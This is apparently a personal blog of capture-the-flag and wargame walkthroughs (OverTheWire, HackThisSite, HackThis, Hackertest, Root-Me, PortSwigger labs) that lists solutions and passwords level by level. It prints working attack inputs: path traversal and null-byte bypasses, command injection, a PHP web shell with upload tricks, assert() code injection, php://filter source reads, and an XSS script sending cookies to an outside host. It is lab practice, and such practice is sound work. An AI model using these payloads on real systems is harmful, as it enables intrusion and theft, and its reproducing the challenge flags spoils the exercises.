Directory traversal Attacks

September 23, 2023September 23, 2023 | shadow0x33

Web Security Academy Labs

File path traversal, simple case

`image?filename=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin …`

File path traversal, traversal sequences blocked with absolute path bypass

image?filename=/etc/passwd

File path traversal, traversal sequences stripped non-recursively

?filename=....//....//....//etc/passwd

File path traversal, traversal sequences stripped with superfluous URL-decode

`?filename=..%252f..%252f..%252fetc/passwd

Decodes to ..%2f..%2f..%2fetc/passwd`

File path traversal, validation of start of path

?filename=/var/www/images/../../../etc/passw

File path traversal, validation of file extension with null byte bypass

?filename=../../../etc/passwd%00.jpg

Mr Robot Capture the Flag

January 10, 2018January 10, 2018 | shadow0x33

Over The Wire: Natas Solutions Levels 0-10

January 10, 2018 | shadow0x33

The following is my write up to solving the challenges 0-10 in Natas Wargame presented by overthewire.org

Level 1

Logining with natas0, natas0 like directions say. A pop up box tells me the password is somewhere on that page. Inspecting the source, I can see the password.

gtVrDuiDfck831PqWsLEZy5gyDz1clto

Level 2

Viewing the source code I find a link to another file. Navigating to the /file directory I get the password to level 3.

sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Level 3

Upon logging into level 3 and viewing the source code I find a clue: “…not even Google will find it this time.”

A robots.txt file lists the files on the website that are not to be crawled by Google. Browsing to robots.txt, I see that a directory called ‘s3cr3t’ is referenced. Upon navigating to that directory, I see a ‘password’ file. Clicking it gives me the password to the next level.

Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 4

After logging in I’m presented with the following:

For this I installed the Firefox addon ‘Tamper Data’ which allows me to capture and edit my http request before it is sent to the server. I change the ‘referrer header’ field to http://natas5.natas.labs.overthewire.org and refresh the page.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 5

After logging in to level 5, I’m presented with the following:

Looking at the source code doesn’t provide any further clues. For this challenge I installed a chrome extension that allowed me to edit the cookie and change the ‘logged in’ variable from 0 to 1. After reloading the page, voila, I’m presented with the password to the next level.

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6

After logging in to level 6, I am presented with the following:

Checking out the source code I see the following:

I click the link ‘index-source.html’, and see a file named ‘secret.inc’ has been included:

Navigating to http://natas6.natas.labs.overthewire.org/includes/secret.inc, I am provided the password to the next level.

Level 7

After logging in to level 7, I am presented with the following 2 links:

When clicking ‘home’ I notice the url changes to natas7.natas.labs.overthe…./index.php?page=home

Now, checking out the source code I am given the following clue:

I appended ‘/etc/natas_webpass/natas8’ to the end of the url following the ‘page=’ parameter and see I was able transverse the directory and obtain the password to the next level.

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 8

Logging into level 8, I’m presented with the following:

Checking out the sourcecode I’m given a clue:

I’m given the secret in encoded form, the methods used to encode it, and the order in which the methods were applied. To solve this level, I run php in interactive mode (-a) to decode the secret using the following commands:

I submit the secret ‘oubWYf2kBq’ and receive the password for the next level.

Level 9

Upon logging in to level 9, I am presented with the following:

Checking out the source code I see another php script is being used:

I see that the script is greping the dictionary file. I can chain commands together by using the shell command separator ;. Thinking back to Natas 7, I learned that the passwords are stored in /etc/natas_webpass/respectiveLevel and construct a chained command using this knowledge:

grep-i ; cat/etc/natas_webpass/natas10# dictionary.txt

I used an additional argument in our command chain (#) to comment anything after that operator. Thus, restricting my search to only /etc/natas_webpass/natas10. From there I am given my password to the next level:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 10

Overthewire: Leviathan Solutions

January 10, 2018 | shadow0x33

The following is a walk through on how to solve the Leviathan wargame featured on Overthewire.org. For this wargame, we ssh on port 2223 to access the levels. Passwords for each level reside in the /etc/leviathan_pass directory. Files for each level reside in the /home directory.

The username and password is provided for level 0.
username: leviathan0
password: leviathan0

Level 0

ssh levianthan0@leviathan.labs.overthewire.org -p 2223
When prompted, enter the password ‘leviathan0’

Running la -la we’ll check what’s in our directory:
leviathan0@leviathan:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Nov 13 16:03 .
drwxr-xr-x 10 root root 4096 Nov 13 16:03 ..
drwxr-x— 2 leviathan1 leviathan0 4096 Nov 13 16:03 .backup
-rw-r–r– 1 root root 220 Sep 1 2015 .bash_logout
-rw-r–r– 1 root root 3771 Sep 1 2015 .bashrc
-rw-r–r– 1 root root 655 Jun 24 2016 .profile

The .backup directory looks promising.
leviathan0@leviathan:~$ cd .backup/
leviathan0@leviathan:~/.backup$ ls
bookmarks.html

cat bookmarks.html and run a search in your console for the word ‘password’. You will find the following line:
the password for leviathan1 is rioGegei8m

Level 2

ssh leviathan2@leviathan.labs.overthewire.org -p 2223
When prompted enter the password we found in the previous level:
rioGegei8m

Running ls we see an executable in our folder named ‘check’. Running ltrace on the executable gives us the following information:

leviathan1@leviathan:~$ ltrace ./check
__libc_start_main(0x804858d, 1, 0xffffd6f4, 0x8048670
printf(“password: “) = 10
getchar(0x80486f0, 0, 0xf7e45830, 0x80486bbpassword: nnnn
) = 110
getchar(0x80486f0, 0, 0xf7e45830, 0x80486bb) = 110
getchar(0x80486f0, 0, 0xf7e45830, 0x80486bb) = 110
strcmp(“nnn”, “sex”) = -1
puts(“Wrong password, Good Bye …”Wrong password, Good Bye …
) = 29
+++ exited (status 0) +++

First, we must understand what the ‘strcmp’ function does.
strcmp(“str1”, “str2”)
This function starts comparing the first character of each string. If they are equal to each other, it continues with the following pairs until the characters differ or until a terminating null-character is reached.

From this we can see the executable prompts us for the password and compares it against the word “sex”. Therefore, entering “sex” as the password will give us a shell. From there all we have to do is cat the contents of ‘leviathan2’ from the /etc/leviathan_pass directory.

leviathan1@leviathan:~$ ./check
password: sex
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Level 3

ssh leviathane@leviathan.labs.overthewire.org -p 2223
When prompted, enter the password we identified in the previous level:
ougahZi8Ta
Let’s run ‘ls -la’ to see what’s inside our directory and view the permissions of the files.

leviathan3@leviathan:~$ ls -la
total 32
drwxr-xr-x 2 root root 4096 Nov 13 16:03 .
drwxr-xr-x 10 root root 4096 Nov 13 16:03 ..
-rw-r–r– 1 root root 220 Sep 1 2015 .bash_logout
-rw-r–r– 1 root root 3771 Sep 1 2015 .bashrc
-rw-r–r– 1 root root 655 Jun 24 2016 .profile
-r-sr-x— 1 leviathan4 leviathan3 10176 Nov 13 16:03 level3

We find another executable entitled ‘level3’. Let’s run it to see what it does.
leviathan3@leviathan:~$ ./level3
Enter the password> 123
bzzzzzzzzap. WRONG

Now run an ltrace to see which libraries are being called.
leviathan3@leviathan:~$ ltrace ./level3
__libc_start_main(0x804867e, 1, 0xffffd6f4, 0x8048750
strcmp(“h0no33”, “kakaka”) = -1
printf(“Enter the password> “) = 20
fgets(Enter the password> 123
“123\n”, 256, 0xf7fc75a0) = 0xffffd4ec
strcmp(“123\n”, “snlprintf\n”) = -1
puts(“bzzzzzzzzap. WRONG”bzzzzzzzzap. WRONG
) = 19
+++ exited (status 0) +++

Examining the code, we can see that after we enter the password ‘123’, strcmp compares it against the string ‘snlprintf’. Likewise, if we enter ‘snlprintf’ as the password, it should work.

leviathan3@leviathan:/tmp/emily1$ ./level3
Enter the password> snlprintf
[You’ve got shell]!

From there, we simply cat the contents of the file /etc/leviathan_pass/leviathan4

$ cat leviathan4
vuH0coox6m

Level 4

ssh leviathan4@leviathan.labs.overthewire.org -p 2223
When prompted, enter the password we located in the previous level:
vuH0coox6m

Run ls -la to see what is inside our directory.

leviathan4@leviathan:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Nov 13 16:03 .
drwxr-xr-x 10 root root 4096 Nov 13 16:03 ..
-rw-r–r– 1 root root 220 Sep 1 2015 .bash_logout
-rw-r–r– 1 root root 3771 Sep 1 2015 .bashrc
-rw-r–r– 1 root root 655 Jun 24 2016 .profile
dr-xr-x— 2 root leviathan4 4096 Nov 13 16:03 .trash

The trash directory looks interesting, let’s change into it.
cd .trash

Run ls -la again.
leviathan4@leviathan:~/.trash$ ls -la
total 16
dr-xr-x— 2 root leviathan4 4096 Nov 13 16:03 .
drwxr-xr-x 3 root root 4096 Nov 13 16:03 ..
-r-sr-x— 1 leviathan5 leviathan4 7460 Nov 13 16:03 bin

We see an executable called bin, running it outputs the following:
leviathan4@leviathan:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
Awesome! Let’s convert that binary to text using an online application. Doing so outputs the password to level 5:
Tith4cokei

Level 5

In our directory we find another executable ‘leviathan5’. Let’s run it:
leviathan5@leviathan:~$ ./leviathan5
Cannot find /tmp/file.log

Now use ltrace to see what libraries are being used:
leviathan5@leviathan:~$ ltrace ./leviathan5
__libc_start_main(0x80485dd, 1, 0xffffd6e4, 0x8048680
fopen(“/tmp/file.log”, “r”) = 0
puts(“Cannot find /tmp/file.log”Cannot find /tmp/file.log
) = 26
exit(-1
+++ exited (status 255) +++
leviathan5@leviathan:~$

As we can see, the executable opens and reads the contents of /tmp/file.log.
I wonder if we can copy /etc/laviathan_pass/leviathan6 to the /tmp directory and then rename it file.log. Let’s try:
leviathan5@leviathan:~$ cp /etc/leviathan_pass/leviathan6 /tmp
cp: ‘/etc/leviathan_pass/leviathan6’ and ‘/tmp/leviathan6’ are the same file
leviathan5@leviathan:~$ mv /tmp/leviathan6 /tmp/file.log

Now let’s run the executable again:
leviathan5@leviathan:~$ ./leviathan5
UgaoFee4li

Hooray!

Level 6

ssh leviathan6@leviathan.labs.overthewire.org -p 2223
When prompted enter the password we identified in the previous level:
leviathan5@leviathan:~$ ./leviathan5
UgaoFee4li

In our directory, we find another executable called leviathan6. Running it provides the following output:
leviathan6@leviathan:~$ ./leviathan6
usage: ./leviathan6

Run ltrace to see which libraries are being used:
leviathan6@leviathan:~$ ltrace ./leviathan6
__libc_start_main(0x804853d, 1, 0xffffd6e4, 0x80485d0
printf(“usage: %s \n”, “./leviathan6″usage: ./leviathan6
) = 35
exit(-1
+++ exited (status 255) +++

No helpful information can be infered. Let’s try and bruteforce the 4 number code using a simple bash script.
First make a temporary directory under /tmp and use nano to create a file named ‘brute.sh’.
leviathan6@leviathan:~$ mkdir /tmp/emily2
leviathan6@leviathan:~$ cd /tmp/emily2
leviathan6@leviathan:/tmp/emily2$ nano /tmp/emily2/brute.sh
Unable to create directory /home/leviathan6/.nano: Permission denied
It is required for saving/loading search history or cursor positions.
Press Enter to continue
In the editor we create our simple script:

#! /bin/bash
for a in {0000..9999}
do
~/levianthan6 $a
done

Save the script and run chmod +x to make it executable.
Run the script, after a few seconds we can see the 4 digit code has been bruteforced and we have a shell, now all we have to do is run:
cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Level 7

ssh levianthan7@leviathan.labs.overthewire.org -p 2223
When prompted enter the password we located in the previous level:
ahy7MaeBo9

Then run ls to see what’s in our directory. I see a file named ‘CONGRATULATIONS’, I cat it to see what it says:
leviathan7@leviathan:~$ ls
CONGRATULATIONS
leviathan7@leviathan:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.

Hooray! We have defeated the Laviathan Wargame on Overthewire.org! Super easy, huh?

Hackthissite: Javascript Mission Solutions

January 10, 2018 | shadow0x33

Level 1

Challenge:

This level is super easy. All you have to do is check the source code for the answer. You will see the following:

As we can see, the function check(x) determines if x == cookies, if so we will get an alert that says ‘win!’. Let’s enter ‘cookies’ as our password. Bingo!

Level 2

Challenge:

We need to disable javascript to complete the mission. You can download a browser extension that allows you to do so. I used the google chrome extension ‘quick javascript switcher’ to switch off javascript. Next I click ‘take this challenge’ and am presented with the following link that says ‘click here to win!’ Right click your mouse and select inspect. Expand the code and you will find the following link. Clicking it will successfully complete the challenge.

Level 3

Challenge:

All this level takes to solve it is some simple math. We see the correct answer is the length of value ‘moo’. Let’s solve for ‘moo’.

foo = 47

bar = 47%8 = 7

moo = 7 * 2 = 14

Entering a password with a length of 14 will successfully complete the challenge.

Level 4

Challenge:

Viewing the sourcecode we can see once again, function check(x) checks to see whether the password = RawrRawr. In the very first line of the code we see RawrRawr = moo. Entering moo should allow us to successfully beat the mission.

Level 5

Challenge:

Let’s check out the source code:

We can see the function check(x) checks to see whether x == moo and if so we’re able to successfully beat the challenge. Line one tells us the unescaped value of moo which appears to be url encoded. Using an online url decoder app, we can determine the password is ‘ilovemoo’.

Level 6

Challenge:

Let’s view the source code:

This code is all messed up, but thinking it through we can see we need to navigate to

https://hackthissite.org/missions/javascript/6/checkpass

to get the solution for the level.

The function checkpass(pass) says if pass == rawr+” “+moo, we’ve successfully defeated the challenge. Above the code we can see rawr = “moo” and moo = “pwns”. So if we enter moo pwns as the password it should be correct…and it is!

Level 7

Challenge:

Viewing the source code shows the following:

Clearly the javascript for this level’s password has been obfuscated. We can use an online app to deobfucate it. The result is:

< button onclick = ‘javascript:if (document.getElementById(“pass”).value==”j00w1n”){alert(“You WIN!”);window.location += “?lvl_password=”+document.getElementById(“pass”).value}else {alert(“WRONG! Try again!”)}’ > Check Password < /button>

We can see the script checks to see if the value we enter equals j00w1n. If so, we get the alert “You win!” in your browser. Let’s try that password to successfully complete the challenge.

Hooray! We’ve conquered the Javascript Missions on Hackthissite.org!

Hack This: Solutions for Real Missions

January 10, 2018 | shadow0x33

Level 1

Challenge:

Clicking on the email link, we are taken to our target’s email account. We see 2 emails in the inbox and 1 in the trash with the subject ‘Password Request’ from the sender ustudio, the maker of World of Peacecraft. Opening the email we’re presented with our target’s password, awesome! I noticed one of the emails in our target’s email box has the subject ‘Activate Account’ sent from World of Peacecraft. Since we have the password we can easily login and successfully complete the mission.

Level 2

Challenge:

Clicking ‘library gateway’ we are presented with a login page.

We can check out the source code by mouse clicking right, selecting inspect and expanding the arrows. Scanning function loadimage we can see the directory ‘members’ is references. Appending ‘members’ to the end of our url takes us to the following page:

I click each link and find nothing useful. Not knowing what else to do I entered ‘sam’ as the username and password. Then tried luke and 9312 combo. When I used the combo librarian sweetlittlebooks, I hit the jackpot and successfully completed the challenge.

Level 3

Challenge:

Clicking the login page link and inspecting the code gives us a clue:

Clicking on login.js we’re taken to the following page:

It is clear that this page holds the data of the users, and their passwords as well, but it is not in plain text. It has been encrypted as we can see from the login page’s source code. But I’m not quite sure how to reverse engineer it so I try guessing what other files I can find. When navigating to https://www.hackthis.co.uk/levels/extras/real/3/members.js I can see a list of member’s usernames and passwords.

Trying each allows us to successfully complete the challenge.

Level 4

Challenge:

We’re given 4 links to the following urls:

Safe Transfer: https://www.hackthis.co.uk/levels/extras/real/4/safetransfer/
Planet Bid: https://www.hackthis.co.uk/levels/extras/real/4/planetbid/account.php?admin
Top 10: https://www.hackthis.co.uk/levels/extras/real/4/top10.html
Email: https://www.hackthis.co.uk/levels/extras/real/4/email_beta/index.php

Revoked.Mayhem mentioned the security of Planet Bid was weak, so head to that url first. I click the link ‘admin’ and try all the passwords listed on ‘Top 10’. Using the password ‘asdfg’ I successfully login.

The writer of the email didn’t mention what the item even was he’s trying to get payment for so we’ve got to figure that out on our own. I click ‘Bids’ and see that buyers and sellers are referred to my numbers. I click ‘Members’ and find that Revoked.Mayhem is user number 31. Referring back to the ‘Bids’ link we can see member number 11 is who he sold the item to. Member number 11 is username: Nemisis with the email address jfelliot@mail.com.

I want access to Nemisis’ Safe Transfer account so I head to https://www.hackthis.co.uk/levels/extras/real/4/email_beta/index.php and click ‘forgot password’. I enter his username and email address and get confirmation the password has been sent to his email address. Now all we need to do is get access to his email address and read the message.

Heading over to https://www.hackthis.co.uk/levels/extras/real/4/email_beta/index.php, I enter ‘jfelliot’ as the username and cycle through the passwords listed on the ‘Top 10′ list to get access to the account but am unsuccessful. Now what?

I head back to https://www.hackthis.co.uk/levels/extras/real/4/planetbid/view.php?members&1=user&2=email and note the information included in the url. We can see a query is being executed to pull the member’s usernames and email addresses. What if we replace ’email’ with ‘passwords’? Doing so doesn’t give us the results I was hoping so I try using ‘pass’ instead. Bingo!

The passwords appear to be hashed. Let’s try to ‘crack’ user Nemisis’s hash using https://crackstation.net/. Successful!

Nemisis’ password is chicken. Using the name ‘jfelliot’ and password ‘chicken’ I am able to gain access to Nemisis’s email account. Finally! From there I’m able to find the email that was sent when I clicked ‘forgot password’ on the safe transfer login page. Horrary we found his pass!

I login to nemisis account and transfer the amount owed to Revoked.Mayham. I whole 1.32. Dumb. Before I submit though I need to clear the logs at Planet Bids.
Click ‘view’ then ‘clear logs’.

Finally I am able to successfully complete the challenge. This challenge was almost harder to explain than it was to solve.

Level 5

Challenge:

Clicking on ‘here it is’ we’re provided the following input box to enter the password and gain access to the site.

Checking the source code provides no useful information so let’s check to see whether the page is vulnerable to sql injection by inserting a ‘ at the end of our url. Bingo.

Running a quick scan using sqlmap I’m informed the application is also vulnerable to file inclusion.

https://www.hackthis.co.uk/levels/extras/real/5/admin.php

Let’s modify the above url to the following: https://www.hackthis.co.uk/levels/extras/real/5/?p=admin.php and include two dots and a backslash between ‘p=’ and ‘admin.php’ to try and tranverse the network.

https://www.hackthis.co.uk/levels/extras/real/5/?p=../admin.php.

Nada. Let’s try adding a nullbyte to the end of the url as well

https://www.hackthis.co.uk/levels/extras/real/5/?p=../admin.php%00.

Bingo! We’re presented with another input box. Right clicking the mouse and selecting ‘inspect’ provides us the password to complete the level.

Level 6

Challenge:

Alternative homepage:

Target website:

Now let us think for a moment. There are no accounts to steal. Anything sent through the contact form would, presumably, be mailed to the admin of the website. Considering that, how would we perform an intrusion?

Not knowing where to start, I did my research. Pruning the various less-than-helpful resources I found, there is this XSS cookie stealing guide which, to any PHP programmer, will look very easy to understand. My knowledge of PHP is limited, as I only did some self-teaching around two years ago, but it is sufficient to understand the script at the bottom. In simple terms, it explains how to steal the admin’s cookie. With said cookie and some cookie editing, we could easily gain admin access to the website and deface it.

This will display the cookie of the chosen webpage. The problem? The text box in the contact form will truncate messages that are longer than 25 characters.

So, we work around this limitation by doing this:

<script>document./*
*/location="http://"+/*
*/"real6.hol"+/*
*/".es/c.php?c"+/*
*/"="+document.cookie;/*
*/</script>

The messages must be sent from last to first, in order. This is because, if you look at the source code of the page, each new message will be added on top of the older one, meaning the first piece of our script needs to be inserted last. The comment delimiters (/* and */) help us “cancel out” the code of the page so that our script is unadulterated.

Indeed, it does function, in theory. But we read something about the webmasters being security folk, which means they are unlikely to fall for such a trick. We need a stealthier way of penetrating their defenses.

So, instead of embedding our script in simple text, we load it through an image instead. A fake image, naturally.

Take note that you should upload your PHP file on your own server for this to work, because later on, you will need to access the log.txt file, where the admin’s login information will be stored. You can either set up a server on your physical (or virtual) machine, or use a free hosting website, for this purpose.

My log.txt file had a relevant entry which recited as follows:

Results may vary, but they will stand out from the other logged accesses regardless, especially as the cookie will not have the SecureSess parameter otherwise.

After gaining this cookie, we go back to the SecureUs website homepage and edit our session cookie with a tool such as EditThisCookie (Chrome add-on), and add the SecureSess parameter to our session, with the value indicated in the log. If you are using EditThisCookie, check the “Secure” and “Session” boxes. If you are editing your cookie in another way, do something analogous. After we are done modifying the cookie, we simply refresh the page.

If you followed all steps properly, the level should now be passed.

Hackertest Solutions Levels 1-20

January 10, 2018April 18, 2021 | shadow0x33

Level 1

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

Source:
<body onLoad=password()>
{
var a=”null”;
function check()
{
if (document.a.c.value == a)
{
document.location.href=”http://www.hackertest.net/”+document.a.c.value+”.htm”;
}
else
{
alert (“Try again”);
}
}
}

From the source code we can tell function check() checks to see whether the user input is equal to a. In the first line the code tells us var a = “null” so that should be the correct password.

Level 2

For this level the password is again included in the source code:

var pass, i;
pass=prompt(“Please enter password!”,””);
if (pass==”l3l“) {
window.location.href=”http://www.hackertest.net/”+pass+”.htm”;
i=4;
}

Level 3 and 4

Source:

<body onload=javascript:pass(); alink=”#000000″>
function pass()
{
var pw, Eingabe;
pw=window.document.alinkColor; // pw=#000000
Eingabe=prompt (“Please enter password”);
if (Eingabe==pw) // if prompt for password = #000000
{
window.location.href=String.fromCharCode(97,98,114,97,101)+”.htm”;
}
else
{
alert(“Try again”);
}
}

String.fromCharCode(97,98,114,97,101) is decoded as abrae -> Navigate to http://www.hackertest.net/abrae.htm for the win.

LEVEL 5

Upon clicking the link to the next challenge as instructed, you’re prompted to enter a password. Press ESC and note you’re redirected to the previous page. View the source code of that page and note the hyperlink to the proceeding challenge. Click it. Therein lies the password.

Level 6

Source:

<!–
var pass, i;
//–>
</script>
< h1>Hacker Test</h1>
<p>Test your hacking skills</p>
<br><br>
<h1>Level 6</h1>http://strongpsswd.js/strong
<br><br>
<center><p>Try again …</p></center>

Click passwd.js

<!–
var pass;
pass=prompt(“Password:”,””);
if (pass==”hackertestz“) {
window.location=”included.htm”;
}else
alert(“Try again…”);
//–>

Level 7

Source:

For challenges like these, be sure to click on and navigate to any links that are included. Navigating to /images/included.gif, the password is written in small font on the lower right hand side of the screen.

Level 8

Navigate to phat.php.

Then to ‘images/phat.gif’

We are given another clue written in teeny font on the lower right hand side of the screen. It says ‘look for a PhotoShop Document’ -> PSD. Change phat.php to phat.psd, a file gets downloaded. Open the file with gimp.

The password is hidden in this picture in the bottom right hand corner of the screen. To view it unobstructed just move the other layers out of the way until the text is fully revealed.

Level 9

For this level we’re told to ‘crack the password’. When we click to view the source code we’re told ‘no source code is provided for this level’. Instead use ‘inspect’ and expand the code to find the password.

From looking at it I can see it’s been base64 encoded. There are many sites where you can decode the value. Navigate to http://www.hackertest.net/gazebruh.php for level 10.

Level 10

At first look, we can already see something’s up as random letters in the top paragraph are italicized. I bet that’s our password. Now we’re presented with the following error message on the page.

Warning: Cannot modify header information – headers already sent by (output started at /home3/jskenned/public_html/hackertest/gazebruh.php:12) in /home3/jskenned/public_html/hackertest/gazebruh.php on line 58

Append /hackertest/gazebryh.php to the end of the url. Check the source:

Level 11

Again let’s check the source:

Navigating to ‘images/try.gif’ we get a page that has ‘nice try’ written in teeny letters at the bottom right hand corner. Back to the source, at the top written in the meta robots field content says “goto: clipart.php”

Level 12

The page contains the message: “3 letters change everything. Look carefully!” Check the source:

In the meta named ‘clue’ it says “use graphic software”. Click on ‘images/logo/jpg’ and zoom in super close. In large letters written across Europe it says puta.php.

Level 13

The meta in the source says same as before ‘use graphic software’. Further down the page gives us the answer.

Navigate to the gif and zoom in super close, it says 4xml.php

Level 14

Checking the source we’re given the same clue to use graphic software.

Click the bidvertiser.gif link and download the file.

Open the file using gimp.

Level 15

We’re given the following message:

Since you still have your photoshop open, check this out: images/pass2level16.jpg << good luck with it!

Download the file and open with gimp.

-image is unavailable–

hmmmm….I guess try unavailable?

Append ‘/images’ at the end of ‘unavailable’ and check sourecode.

<body background=”bg.jpg“>

Download file and open with text editor. You’ll find Ducky.php. Append that to the url following /unavailable.

Level 16

We’re presented with an password input box. Again check the source code. Written about halfway down it says ‘password: your ip address’. To get that open a terminal and type ‘curl icanhazip.com’.

Level 17

Checkout /unavailable/../level18.shtml then check the source. Check out under ‘images’ directory n00b.gif. In the lower right hand corner it says “like a noob!…” Oh, duh..enter n00b as the password.

Level 18

Authorization Required

Think like a n00b.

You will need to enable cookies for the Hacker Test Admin Panel to work as expected.

Password:

If you are looking in the script, you are too far, go back.

Navigate to http://www.hackertest.net/level19.shtml

Level 19

Download ‘images/n00b.gif and open it with gimp.

Level 20

http://hackertest.com/gazebruh2.htm

Root-Me Web Server Challenge Solutions

January 10, 2018October 17, 2018 | shadow0x33

The following is a walk through to solving root-me.org’s web server challenges (work in progress).

HTML

As always, check the source code for the password.

nZ^&@q5&sjJHev0

Command Injection

127.0.0.1;cat index.php

flag: S3rv1ceP1n9Sup3rS3cure

Open Redirect

Check source code. You can see that when an option is selected, you are redirected to, for example, https://facebook.com&h=………. We need to figure out what the value followed by ‘&h=’ is so we can structure our redirect url accordingly. Using an online md5 hash to text converter, we see the value represents the hashed value of the particular url. MD5 hash ‘https://google.com’ and note the value. Start tamper data and click the facebook link. Edit the url so the website redirects to ‘?url=https://google.com&h=<MD5hash of https://google.com>’ instead of facebook. Then submit the page.

e6f8a530811d5a479812d7b82fc1a5c5

User-Agent

User tamper data to change the user-agent from it’s original value to ‘admin’.

rr$Li9%L34qd1AAe27

HTTP Directory Indexing

Clue: Control + U

<!– include(“admin/pass.html”) –>

Navigate to:

http://challenge01.root-me.org/web-serveur/ch4/admin/pass.html

J’ai bien l’impression que tu t’es fait avoir / Got rick rolled ? 😉
T’inquiète tu n’es pas le dernier / You’re not the last :p

Cherche BIEN / Just search

Transverse up to admin directory

/web-serveur/ch4/admin/

File Name ↓	File Size ↓	Date ↓
Parent directory/	–	–
backup/	–	02-Apr-2013 12:35
pass.html	346	24-Oct-2015 11:14

Select backup, then admin.txt

Password: LINUX

HTTP Tampering

‘Http response gives us informations’

I used the Firefox extension ‘Open HTTP Requester’ to solve this challenge. Issuing a request to the page I see a header named ‘Header-Rootme-Admin’ with a value set to none. To successfully complete the challenge I issued the request again, this time adding a custom header to the request: ‘Header-Rootme-Admin’ with a value of ‘admin’.

HeadersMayBeUseful

Verb Tampering

Authorization can sometimes be bypassed by tampering with HTTP methods. For this exercise I utilized the Firefox extension ‘Open HTTP requester’ to send a put request to http://challenge01.root-me.org/web-serveur/ch8/ and get the password to the challenge.

a23e$dme96d3saez$$prap

Install Files

‘You know phpbb’

Phpbb’s installation folders are located in ‘phpbb/install/install.php’ so I appended that to the end of the challenge’s url.

karambar

Improper Redirect

To solve this challenge I used OWASP’s ZAP Proxy to capture the request sent to http://challenge01.root-me.org/web-serveur/ch32/index.php

File Upload

Double File Extension

Referring to the documentation provided along with this challenge, I wrote a quick php script:

<?php

system ($_GET[‘command’]);

?>

and saved it as php_shell.php.jpg. Sometimes you can trick the web server into accepting your php file by adding an acceptable file extension (jpg, png, gif) to the end of the php file extension. After uploading the file, we navigate to it and inject our command into the url.

‘…..php_shell.php.jpg?command=cat ../../../.passwd’

File Upload

MIME Type

For this challenge, we use burp to capture the post request sent to the server when trying to upload our php shell script and change the ‘content-type’ from ‘application/x-php’ to ‘image/jpeg’. This will trick the server into accepting the upload, thinking it’s a jpg file. Click icon on our file and, like before, inject our command into the url:

http://challenge01.root-me.org/web-serveur/ch21/galerie/upload/gsejso5erm5ahvm8i561a9tdh7//shell.php?command=cat%20../../../.passwd

a7n4nizpgQgnPERy89uanf6T4

HTTP Cookies

This challenged really irritated me because it took me 3 different plugins to find one that would work. Once I did, solving the challenge is a no-brainer. Click on ‘saved email addresses’, we get an error that says we must be admin. Checking the url:

http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur

but simply replacing ‘visiteur’ with ‘admin’ we get an error that says there’s an issue with the cookie value. Install the firefox plugin ‘Live HTTP Headers’ and click the ‘Saved email addresses’ link again. In live http headers, you can see the cookie: ch7=visiteur. Click ‘replay’ and change ‘visiteur’ to ‘admin’, then replay again. In the browser click the link once more to find the validation password.

PHP Assert()

In php, assert() will evaluate whether an assertion supplied is TRUE or FALSE. If FALSE, it will take appropriate action.

We have the following url:

http://challenge01.root-me.org/web-serveur/ch47/?page=home

http://challenge01.root-me.org/web-serveur/ch47/?page=index.php../../../../../etc/passwd.php throws the following error:

Warning: assert(): Assertion “strpos(‘includes/index.php../../../../../etc/passwd.php’, ‘..’) === false”

http://challenge01.root-me.org/web-serveur/ch47/?page=’,’s’) and system(‘cat .passwd’) and strpos(‘

File Upload

Null Byte

Passing this level is super easy. Use the same shell as before. Say your the file name of your shell is shell.php. Rename it to shell.php%00.jpg. When submitted, the .jpg file extension will be dropped due to the preceding nullbyte. Once the file has uploaded, click it.

YPNchi2NmTwygr2dgCCF

Directory Transversal

We have url like this: http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=emotes.

The parameter galerie displays different categories. We can deduce ‘galerie’ holds all the files. Navigating to http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie= we can see a hidden folder beginning with ’86hv’. Move your mouse above the icon and right click, select inspect element to get the full folder name.

86hwnX2r

Navigate to http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=86hwnX2r, you’ll see a file password.txt. Right click and view the source code. Click the ‘password.txt’ hyperlink for the password.

kcb$!Bx@v4Gs9Ez

PHP Filter

PHP filters are used to validate and sanitize external input.

There are number of filters that can be applied. One built in filter is convert.*

base64-encode and base64-decode, the former of which will be used in this exploit.

It will go like php://filter/filter_to_use

In this exploit:

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode

When clicking the login hyperlink, we can see what the script is doing:

http://challenge01.root-me.org/web-serveur/ch12/?inc= login.php

php://filter/convert.base64-encode/resource allows us to read any source of a php file. It forces PHP to base64 encode the file before it is used in the require statement. From there decoding the base64 string will give us the source code for whichever php file is called by parameter ‘resource’.

Example:

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=index.php.

We continue guessing helpful php files such as config.php

http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php

<?php

$username=”admin”;
$password=”DAPt9D2mky0APAF”;

?>

PHP Globals

Navigate to …./index.php.bak and open the file.

This is the important stuff

…..

if (( isset ($password) && $password!=”” && auth($password,$hidden_password)==1) || (is_array($_SESSION) && $_SESSION[“logged”]==1 ) ){
$aff=display(“well done, you can validate with the password : $hidden_password”);
} else {
$aff=display(“try again”);
}

…….

